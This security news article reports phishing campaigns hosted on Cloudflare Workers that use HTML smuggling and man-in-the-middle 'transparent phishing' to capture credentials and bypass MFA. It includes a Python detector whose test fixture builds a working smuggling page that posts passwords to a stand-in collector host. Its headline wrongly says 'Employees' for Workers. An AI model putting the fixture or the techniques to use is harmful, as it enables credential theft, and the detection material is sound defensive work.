Threat Actors Exploiting Cloudflare Employees for Sophisticated Phishing Attacks

Attackers are abusing Cloudflare Workers, a free serverless platform, to host phishing sites. The platform lets them spin up many applications that serve malicious content to a large audience on free subdomains with valid certificates.

Researchers observed a rise in such activity in 2023, with the number of targeted users peaking in Q4. While the number of targeted users appears to have stabilized in 2024, the number of distinct malicious applications (identified by unique subdomains) continues to grow steadily.

Figure: Unique user traffic per quarter

Attackers are leveraging Cloudflare Workers to host phishing campaigns that use HTML smuggling to bypass network defenses: the malicious payloads, in this case the phishing pages themselves, are hidden within seemingly harmless web pages.

They achieve this by first encoding the phishing page in base64 and then applying multiple further encoding layers for obfuscation. To make the hidden content accessible, the page’s script creates a blob URL using the createObjectURL() method and then simulates a click on that URL using the click() method, so the phishing page is rendered in the victim’s browser from content that was already embedded in the decoy page.

Figure: The actual phishing page as a blob inside a benign web page
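As an added example (not code from the article or from Netskope Threat Labs), the following Python checker applies the indicators described above to a captured page: it looks for the blob-URL plus simulated-click pattern and peels nested base64 layers to see whether a login form is hidden inside. The indicator regexes, the scoring rule and the decoy page used as input are all constructed here for illustration.

```python
import base64
import re
# Static indicators of the blob-URL smuggling pattern described in the article.
INDICATORS = {
    "blob_url": re.compile(r"createObjectURL\s*\("),
    "auto_click": re.compile(r"\.click\s*\(\s*\)"),
    "decoder": re.compile(r"\batob\s*\(|new\s+Blob\s*\("),
}
# Long runs of base64 alphabet are candidate smuggled payloads.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
LOGIN_FORM = re.compile(r"<form\b|type\s*=\s*[\"']?password", re.I)

def peel_base64(blob, max_layers=5):
    """Strip nested base64 layers, stopping at the first layer that yields markup.
    Returns (layers_removed, innermost_text)."""
    text, layers = blob, 0
    while layers < max_layers:
        try:
            decoded = base64.b64decode(text, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):  # not base64, or a binary payload
            break
        text, layers = decoded, layers + 1
        if "<" in text and ">" in text:
            break
    return layers, text

def analyze(html):
    """Score one HTML document for the smuggling indicators; returns a dict."""
    hits = {name: bool(rx.search(html)) for name, rx in INDICATORS.items()}
    layers, login_form = 0, False
    for run in B64_RUN.finditer(html):
        depth, inner = peel_base64(run.group(0))
        layers = max(layers, depth)
        login_form = login_form or (depth > 0 and bool(LOGIN_FORM.search(inner)))
    smuggling = hits["blob_url"] and hits["auto_click"] and layers > 0
    verdict = "likely HTML smuggling" if smuggling else "no smuggling indicators"
    return {**hits, "base64_layers": layers, "decoded_login_form": login_form, "verdict": verdict}

# Constructed test fixture (not a sample from the campaign): a decoy page whose script
# decodes a doubly base64-encoded login form into a blob URL and auto-clicks it.
INNER_PAGE = ('<html><body><form method="post" action="https://collector.example.invalid/">'
              '<input name="user"><input name="pass" type="password"></form></body></html>')

def build_fixture(layers=2):
    payload = INNER_PAGE.encode()
    for _ in range(layers):
        payload = base64.b64encode(payload)
    decode_call = "atob(" * layers + f'"{payload.decode()}"' + ")" * layers
    return ('<html><body><p>Loading your document...</p><script>'
            f'var b = new Blob([{decode_call}], {{type: "text/html"}});'
            'var a = document.createElement("a"); a.href = URL.createObjectURL(b); a.click();'
            '</script></body></html>')
```

Running analyze(build_fixture()) reports two base64 layers and a decoded login form; a page with a bare base64 blob but no createObjectURL()/click() pair is not flagged, which keeps the rule from firing on ordinary inline images or fonts.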

Adversaries are also employing transparent phishing, a novel technique that avoids the limitations of traditional phishing.

In transparent phishing, attackers deploy a server that acts as a Man-in-the-Middle (MitM) between the victim and the legitimate service. It relays the victim’s login credentials and multi-factor authentication codes to the real service, gaining access while covertly capturing this sensitive data.

Unlike traditional phishing with imitated login pages, transparent phishing displays the legitimate login page itself, making detection through visual cues difficult. Because the relayed session completes the real authentication flow, the technique effectively bypasses multi-factor authentication and poses a significant security threat.

Figure: Transparent phishing page showing the exact content of the legitimate login page

Researchers mimicked transparent phishing pages on Cloudflare to analyze the attack method. Using a modified open-source MITM toolkit, attackers create a Cloudflare Worker that intercepts user requests.

When a victim accesses the fake login page, the attacker’s script gathers the details of the user’s request (method, region, IP, and headers). With this information, the worker impersonates the victim and fetches the real login page from the legitimate site.

The worker then intercepts the legitimate response, replaces the real site’s domain with the attacker’s own, and presents the rewritten page to the victim, who unknowingly submits credentials through the malicious page.

Figure: Code snippet

In summary, attackers are abusing Cloudflare Workers, a platform for running serverless functions, to host phishing websites and steal login credentials through a combination of techniques.

One method involves tricking victims into logging in to a legitimate website through a fake login page hosted on a Cloudflare Worker, where the attacker intercepts the communication between the victim and the real website and captures login tokens and cookies.

Another technique uses HTML smuggling to bypass security measures. Netskope Threat Labs is actively monitoring malicious traffic on Cloudflare Workers and reporting phishing attempts to Cloudflare for takedown. 

Kaaviya (https://cyberpress.org/)
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She covers various cyber security incidents happening in cyberspace.
